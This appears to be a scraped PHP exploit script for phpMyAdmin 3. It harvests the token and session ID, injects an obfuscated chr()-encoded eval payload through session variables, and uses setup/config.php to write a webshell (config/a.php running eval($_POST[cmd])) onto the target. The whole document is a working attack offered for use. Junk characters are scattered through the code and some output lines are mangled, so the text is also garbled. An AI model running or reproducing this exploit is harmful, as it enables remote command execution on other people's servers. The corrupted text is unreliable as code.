0 Y9 T9 e! F$ Z+ V" S2 e; ?. V. f/**0 |3 W( i. c$ j. n& h& ^
* working when the directory:"config" exists and is writeable.; B7 O( I3 O: _) u/ h+ Q
**/* i/ D# J* p5 N* ]" `" Z
U$ G9 e+ x0 E8 I% A) G1 H9 h7 [if ($argc < 3) { 5 q' n% c6 H' X0 H O9 s9 @ print_r(' ! |0 d& B. u) g+---------------------------------------------------------------------------+ % x3 M j$ G# A0 t1 ^9 |Usage: php '.$argv[0].' host path9 p7 X* d5 }) S
host: target server (ip/hostname), j2 b7 P+ k" M$ m8 O, g( h
path: path to pma3 , U+ @1 I. x' {/ Q- B! P% pExample: $ _9 N* b' Q. I( k `php '.$argv[0].' localhost /pma/ 1 G3 A8 o0 z l+ @9 `+---------------------------------------------------------------------------+ 4 E( e6 k h$ U6 F'); ; m, @6 Z! a4 S3 x: ?: v+ W; K exit; ' t: M) r' _' v: M# W} 3 _* V) `3 n# U ( q' e5 B7 _6 T5 @$ V. E9 |$host = $argv[1];2 z p# M" {. u6 T5 j4 v1 i+ ~' L
$path = $argv[2]; ( u) m% K/ s% u: _, `7 {8 G5 ~. Z3 J' q
/** 5 ^ J4 Q( u) h6 P! F * Try to determine if the directory:"config" exists" W4 U9 P! b$ ^( C. _ f
**/& ]6 ]# d. ?) h. G) o. t* H
echo "[+] Try to determine if the directory:config exists....\n";! w4 [ l4 M1 q2 \0 L4 l5 C9 Q
$returnstr=php_request('config/'); / M( C; G# w! O9 }. [4 g% D: lif(strpos($returnstr,'404')){* j3 J7 P* t' n% Q" ]6 d$ V5 K
exit("[-] Exploit Failed! The directory:config do not exists!\n");4 P* t( ^' Z- V! `* u- H
} 3 N2 H' O0 b% O: m- m) } , _9 ~3 [. s. P( p, X* B/**) d b# S* c' O8 i9 Z( [" k3 [
* Try to get token and sessionid7 L) x+ [4 c! V
**/ W& C5 \2 `4 Z' ~
echo "[+] Try to get token and sessionid....\n";$ }. M: E N: D5 v% i
$result=php_request('index.php'); 7 Q% m3 \6 g U0 [' Z; w/ q: {" c1 opreg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp); " U" e- \9 @7 i$ H7 N# w& L$token=$resp[3]; ; J" W& m( J( ]0 X% y4 z5 U9 `$sessionid=$resp[1]; # ^( e6 I+ k Oif($token && $sessionid){+ j* I7 ?1 c' g/ F
echo "[+] tokentoken\n";3 ]9 Q6 p: ]8 P
echo "[+] Session IDsessionid\n";% ^/ S4 e4 J s/ u
}else{# q( Y: X0 L( j* x8 m$ H" O3 [
exit("[-] Can't get token and Session ID,Exploit Failed!\n");+ [! _+ z& i8 E4 n/ ]# E
}1 M: ? R1 m" c
8 B# g, N8 u/ f* I2 e/** & @& |; H8 _" N6 T0 v * Try to insert shell into session 2 n7 w: S z. ]9 k. j**/- I7 ?+ F3 A" T
echo "[+] Try to insert shell into session....\n";0 _& y+ ?( y% I% x( t+ ?
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here. 4 I' j# \: g J" B : H# F M) Z, F) p" u2 m0 i/** ; D; F1 |8 g7 A8 u0 f * Try to create webshell + Z/ I8 b) W3 ^0 ?: T**/ ! G9 q, z8 I! j2 ~/ cecho "[+] Try to create webshell....\n"; * A4 U+ ^3 Y# w# Zphp_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);! N5 F6 n" y. h7 m d9 z8 }
/*** A# W& W' B, W
* Try to check if the webshell was created successfully . R) h. [" _4 s6 \( f**/ 1 R6 Z' W+ k% Pecho "[+] Try to check if the webshell was created successfully....\n"; 1 u) n) c: A: h- S4 M3 x$content=php_request('config/config.inc.php'); ! h: s3 P0 `9 f' l+ qif(strpos($content,'t00ls')){ 9 A0 b. ], U. W6 O echo "[+] Congratulations! Expoilt successfully....\n"; 1 ~8 h$ D+ W a' d$ I echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";; w' s) S) k5 {1 i, s
}else{ A" n* u4 J, V" T7 ^/ E& C% L exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");; K' f: a+ S9 t3 `4 U
}2 X# g: m* l/ b- O8 \/ ?3 X
3 X: ?1 ?* v% S) d: ~# Z- j
function php_request($url,$data='',$cookie=''){ 4 W! D9 c' X0 l; l# j global $host, $path;0 h5 _9 \8 o% R9 u& B6 t& J6 \& `/ m
% I) P/ Z: b' w
$method=$data?'POST':'GET';" _. s q5 J, a+ r7 X
1 ~$ O, M% \# Q8 G7 g. s3 L) n& x $packet = $method." ".$path.$url." HTTP/1.1\r\n";/ i& m: V* t* w' p, I, V6 ]$ {, s
$packet .= "Accept: */*\r\n";8 B( a$ a) H" E+ G: c
$packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";6 z: n& K- _, S8 E$ [6 V+ ~
$packet .= "Host: $host\r\n"; 0 ]" P% V6 ~! u/ f- c $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":""; E7 W" P, f+ H
$packet .= $data?"Content-Length: ".strlen($data)."\r\n":""; . g# z( j" e' {* c( r1 f; q, p- ?! | $packet .= $cookie?"Cookie: $cookie\r\n":"";/ {* i- F |( r( C
$packet .= "Connection: Close\r\n\r\n";, X; w$ N! E' v t3 `$ ^% c
$packet .= $data?$data:"";6 t$ T& {- I: s0 \" ~
2 }; U0 N8 r+ q2 f6 ]
$fp = fsockopen(gethostbyname($host), 80); . ? k4 s% O8 g8 t$ H, ?: p B7 H if (!$fp) {1 W. A( p6 W9 V- ^
echo 'No response from '.$host; die; 3 Z0 p, i i1 d } ( l( h: W+ E, O$ G4 E! u fputs($fp, $packet); ; Q- h, m K \+ B' b& Q' p3 M Y4 {+ Z0 Z; T* p- L, ^0 w $resp = '';6 d0 y+ e, F( T% @7 k
8 ?: f/ U6 J/ e5 O2 Z
while ($fp && !feof($fp)); K5 z& X! K% D0 X# V5 e9 u/ Y
$resp .= fread($fp, 1024); A+ Q! T. U. u: ]% o- d ) l7 T- u% b1 t2 P+ u, k return $resp;+ o: `. f# l* s' Q5 Q5 _! a. k _
} " i2 J2 y' a9 j* {8 y5 t' m 0 E2 f1 w* o$ x, c( x) ~$ v- a. A
?> ) a' A# n6 y$ T2 H+ L
.
token\n";3 ]9 Q6 p: ]8 P